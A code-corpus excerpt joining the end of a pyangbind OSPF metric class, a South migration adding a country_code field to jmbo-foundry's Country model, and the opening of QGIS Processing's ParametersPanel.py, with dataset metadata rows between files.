yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""",
"defined-type": "oc-ospf-types:ospf-metric",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', is_config=False)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
tos = __builtin__.property(_get_tos)
metric = __builtin__.property(_get_metric)
_pyangbind_elements = OrderedDict([("tos", tos), ("metric", metric)])
|
apache-2.0
| -3,628,145,791,548,564,000
| 40.291667
| 440
| 0.575273
| false
| 4.118543
| true
| false
| false
|
praekelt/jmbo-foundry
|
foundry/migrations/0037_auto__add_field_country_country_code__add_unique_country_slug.py
|
1
|
27780
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Country.country_code'
db.add_column('foundry_country', 'country_code',
self.gf('django.db.models.fields.CharField')(max_length=2, unique=True, null=True, db_index=True),
keep_default=False)
# Adding unique constraint on 'Country', fields ['slug']
db.create_unique('foundry_country', ['slug'])
def backwards(self, orm):
# Removing unique constraint on 'Country', fields ['slug']
db.delete_unique('foundry_country', ['slug'])
# Deleting field 'Country.country_code'
db.delete_column('foundry_country', 'country_code')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'category.category': {
'Meta': {'ordering': "('title',)", 'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'category.tag': {
'Meta': {'ordering': "('title',)", 'object_name': 'Tag'},
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'comments.comment': {
'Meta': {'ordering': "('submit_date',)", 'object_name': 'Comment', 'db_table': "'django_comments'"},
'comment': ('django.db.models.fields.TextField', [], {'max_length': '3000'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_comment'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_removed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_pk': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'submit_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comment_comments'", 'null': 'True', 'to': "orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'user_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'user_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'foundry.blogpost': {
'Meta': {'ordering': "('-created',)", 'object_name': 'BlogPost', '_ormbases': ['jmbo.ModelBase']},
'content': ('ckeditor.fields.RichTextField', [], {}),
'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'})
},
'foundry.chatroom': {
'Meta': {'ordering': "('-created',)", 'object_name': 'ChatRoom', '_ormbases': ['jmbo.ModelBase']},
'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'})
},
'foundry.column': {
'Meta': {'object_name': 'Column'},
'designation': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'row': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Row']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'width': ('django.db.models.fields.PositiveIntegerField', [], {'default': '8'})
},
'foundry.country': {
'Meta': {'ordering': "('title',)", 'object_name': 'Country'},
'country_code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'unique': 'True', 'null': 'True', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'minimum_age': ('django.db.models.fields.PositiveIntegerField', [], {'default': '18'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '32'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'foundry.defaultavatar': {
'Meta': {'object_name': 'DefaultAvatar'},
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'defaultavatar_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'foundry.foundrycomment': {
'Meta': {'ordering': "('submit_date',)", 'object_name': 'FoundryComment', '_ormbases': ['comments.Comment']},
'comment_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['comments.Comment']", 'unique': 'True', 'primary_key': 'True'}),
'in_reply_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.FoundryComment']", 'null': 'True', 'blank': 'True'}),
'moderated': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'})
},
'foundry.link': {
'Meta': {'ordering': "('title', 'subtitle')", 'object_name': 'Link'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'target_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'link_target_content_type'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'target_object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'view_name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
},
'foundry.listing': {
'Meta': {'ordering': "('title', 'subtitle')", 'object_name': 'Listing'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['jmbo.ModelBase']", 'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'count': ('django.db.models.fields.IntegerField', [], {}),
'display_title_tiled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'items_per_page': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'pinned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'listing_pinned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['jmbo.ModelBase']"}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'}),
'style': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'foundry.member': {
'Meta': {'object_name': 'Member', '_ormbases': ['auth.User']},
'about_me': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Country']", 'null': 'True', 'blank': 'True'}),
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'dob': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'member_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'mobile_number': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'receive_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'receive_sms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'twitter_username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'foundry.menu': {
'Meta': {'ordering': "('title', 'subtitle')", 'object_name': 'Menu'},
'display_title': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'foundry.menulinkposition': {
'Meta': {'ordering': "('position',)", 'object_name': 'MenuLinkPosition'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'condition_expression': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Link']"}),
'menu': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Menu']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {})
},
'foundry.navbar': {
'Meta': {'ordering': "('title', 'subtitle')", 'object_name': 'Navbar'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'foundry.navbarlinkposition': {
'Meta': {'ordering': "('position',)", 'object_name': 'NavbarLinkPosition'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'condition_expression': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Link']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'navbar': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Navbar']"}),
'position': ('django.db.models.fields.IntegerField', [], {})
},
'foundry.notification': {
'Meta': {'object_name': 'Notification'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Link']"}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Member']"})
},
'foundry.page': {
'Meta': {'object_name': 'Page'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_homepage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'foundry.pageview': {
'Meta': {'object_name': 'PageView'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Page']"}),
'view_name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'foundry.row': {
'Meta': {'object_name': 'Row'},
'block_name': ('django.db.models.fields.CharField', [], {'default': "'content'", 'max_length': '32'}),
'has_left_or_right_column': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Page']"})
},
'foundry.tile': {
'Meta': {'object_name': 'Tile'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'column': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Column']"}),
'condition_expression': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'enable_ajax': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'target_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tile_target_content_type'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'target_object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'view_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'jmbo.modelbase': {
'Meta': {'ordering': "('-created',)", 'object_name': 'ModelBase'},
'anonymous_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'anonymous_likes': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'comments_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comments_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modelbase_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'likes_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'likes_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'primary_category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_modelbase_set'", 'null': 'True', 'to': "orm['category.Category']"}),
'publish_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publishers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['publisher.Publisher']", 'null': 'True', 'blank': 'True'}),
'retract_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'unpublished'", 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Tag']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'photologue.photoeffect': {
'Meta': {'object_name': 'PhotoEffect'},
'background_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}),
'brightness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'color': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'contrast': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'filters': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'reflection_size': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'reflection_strength': ('django.db.models.fields.FloatField', [], {'default': '0.6'}),
'sharpness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'transpose_method': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'})
},
'publisher.publisher': {
'Meta': {'object_name': 'Publisher'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'secretballot.vote': {
'Meta': {'unique_together': "(('token', 'content_type', 'object_id'),)", 'object_name': 'Vote'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'vote': ('django.db.models.fields.SmallIntegerField', [], {})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['foundry']
|
bsd-3-clause
| 169,661,863,726,752,320
| 83.43769
| 208
| 0.546724
| false
| 3.649501
| false
| false
| false
|
siliconsmiley/QGIS
|
python/plugins/processing/gui/ParametersPanel.py
|
1
|
16790
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
ParametersPanel.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
(C) 2013 by CS Systemes d'information (CS SI)
Email : volayaf at gmail dot com
otb at c-s dot fr (CS SI)
Contributors : Victor Olaya
Alexia Mondot (CS SI) - managing the new parameter
ParameterMultipleExternalInput
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import locale
from PyQt4 import uic
from PyQt4.QtCore import QCoreApplication, QVariant
from PyQt4.QtGui import QWidget, QLayout, QVBoxLayout, QHBoxLayout, QToolButton, QIcon, QLabel, QCheckBox, QComboBox, QLineEdit, QPlainTextEdit
from processing.core.ProcessingConfig import ProcessingConfig
from processing.gui.OutputSelectionPanel import OutputSelectionPanel
from processing.gui.InputLayerSelectorPanel import InputLayerSelectorPanel
from processing.gui.FixedTablePanel import FixedTablePanel
from processing.gui.RangePanel import RangePanel
from processing.gui.MultipleInputPanel import MultipleInputPanel
from processing.gui.NumberInputPanel import NumberInputPanel
from processing.gui.ExtentSelectionPanel import ExtentSelectionPanel
from processing.gui.FileSelectionPanel import FileSelectionPanel
from processing.gui.CrsSelectionPanel import CrsSelectionPanel
from processing.gui.GeometryPredicateSelectionPanel import \
GeometryPredicateSelectionPanel
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterTable
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterTableField
from processing.core.parameters import ParameterSelection
from processing.core.parameters import ParameterFixedTable
from processing.core.parameters import ParameterRange
from processing.core.parameters import ParameterMultipleInput
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterExtent
from processing.core.parameters import ParameterFile
from processing.core.parameters import ParameterCrs
from processing.core.parameters import ParameterString
from processing.core.parameters import ParameterGeometryPredicate
from processing.core.outputs import OutputRaster
from processing.core.outputs import OutputTable
from processing.core.outputs import OutputVector
from processing.tools import dataobjects
pluginPath = os.path.split(os.path.dirname(__file__))[0]
WIDGET, BASE = uic.loadUiType(
os.path.join(pluginPath, 'ui', 'widgetParametersPanel.ui'))
class ParametersPanel(BASE, WIDGET):
NOT_SELECTED = QCoreApplication.translate('ParametersPanel', '[Not selected]')
def __init__(self, parent, alg):
super(ParametersPanel, self).__init__(None)
self.setupUi(self)
self.grpAdvanced.hide()
self.layoutMain = self.scrollAreaWidgetContents.layout()
self.layoutAdvanced = self.grpAdvanced.layout()
self.parent = parent
self.alg = alg
self.valueItems = {}
self.labels = {}
self.widgets = {}
self.checkBoxes = {}
self.dependentItems = {}
self.iterateButtons = {}
self.initWidgets()
def initWidgets(self):
#tooltips = self.alg.getParameterDescriptions()
# If there are advanced parameters — show corresponding groupbox
for param in self.alg.parameters:
if param.isAdvanced:
self.grpAdvanced.show()
break
# Create widgets and put them in layouts
for param in self.alg.parameters:
if param.hidden:
continue
desc = param.description
if isinstance(param, ParameterExtent):
desc += self.tr(' (xmin, xmax, ymin, ymax)')
try:
if param.optional:
desc += self.tr(' [optional]')
except:
pass
widget = self.getWidgetFromParameter(param)
self.valueItems[param.name] = widget
if isinstance(param, ParameterVector) and \
not self.alg.allowOnlyOpenedLayers:
layout = QHBoxLayout()
layout.setSpacing(2)
layout.setMargin(0)
layout.addWidget(widget)
button = QToolButton()
icon = QIcon(os.path.join(pluginPath, 'images', 'iterate.png'))
button.setIcon(icon)
button.setToolTip(self.tr('Iterate over this layer'))
button.setCheckable(True)
layout.addWidget(button)
self.iterateButtons[param.name] = button
button.toggled.connect(self.buttonToggled)
widget = QWidget()
widget.setLayout(layout)
#~ if param.name in tooltips.keys():
#~ tooltip = tooltips[param.name]
#~ else:
#~ tooltip = param.description
#~ widget.setToolTip(tooltip)
if isinstance(param, ParameterBoolean):
widget.setText(desc)
if param.isAdvanced:
self.layoutAdvanced.addWidget(widget)
else:
self.layoutMain.insertWidget(
self.layoutMain.count() - 2, widget)
else:
label = QLabel(desc)
#label.setToolTip(tooltip)
self.labels[param.name] = label
if param.isAdvanced:
self.layoutAdvanced.addWidget(label)
self.layoutAdvanced.addWidget(widget)
else:
self.layoutMain.insertWidget(
self.layoutMain.count() - 2, label)
self.layoutMain.insertWidget(
self.layoutMain.count() - 2, widget)
self.widgets[param.name] = widget
for output in self.alg.outputs:
if output.hidden:
continue
label = QLabel(output.description)
widget = OutputSelectionPanel(output, self.alg)
self.layoutMain.insertWidget(self.layoutMain.count() - 1, label)
self.layoutMain.insertWidget(self.layoutMain.count() - 1, widget)
if isinstance(output, (OutputRaster, OutputVector, OutputTable)):
check = QCheckBox()
check.setText(self.tr('Open output file after running algorithm'))
check.setChecked(True)
self.layoutMain.insertWidget(self.layoutMain.count() - 1, check)
self.checkBoxes[output.name] = check
self.valueItems[output.name] = widget
def buttonToggled(self, value):
if value:
sender = self.sender()
for button in self.iterateButtons.values():
if button is not sender:
button.setChecked(False)
def getExtendedLayerName(self, layer):
authid = layer.crs().authid()
if ProcessingConfig.getSetting(ProcessingConfig.SHOW_CRS_DEF) \
and authid is not None:
return u'{} [{}]'.format(layer.name(), authid)
else:
return layer.name()
def getWidgetFromParameter(self, param):
# TODO Create Parameter widget class that holds the logic
# for creating a widget that belongs to the parameter.
if isinstance(param, ParameterRaster):
layers = dataobjects.getRasterLayers()
items = []
if param.optional:
items.append((self.NOT_SELECTED, None))
for layer in layers:
items.append((self.getExtendedLayerName(layer), layer))
item = InputLayerSelectorPanel(items, param)
elif isinstance(param, ParameterVector):
if self.somethingDependsOnThisParameter(param) or self.alg.allowOnlyOpenedLayers:
item = QComboBox()
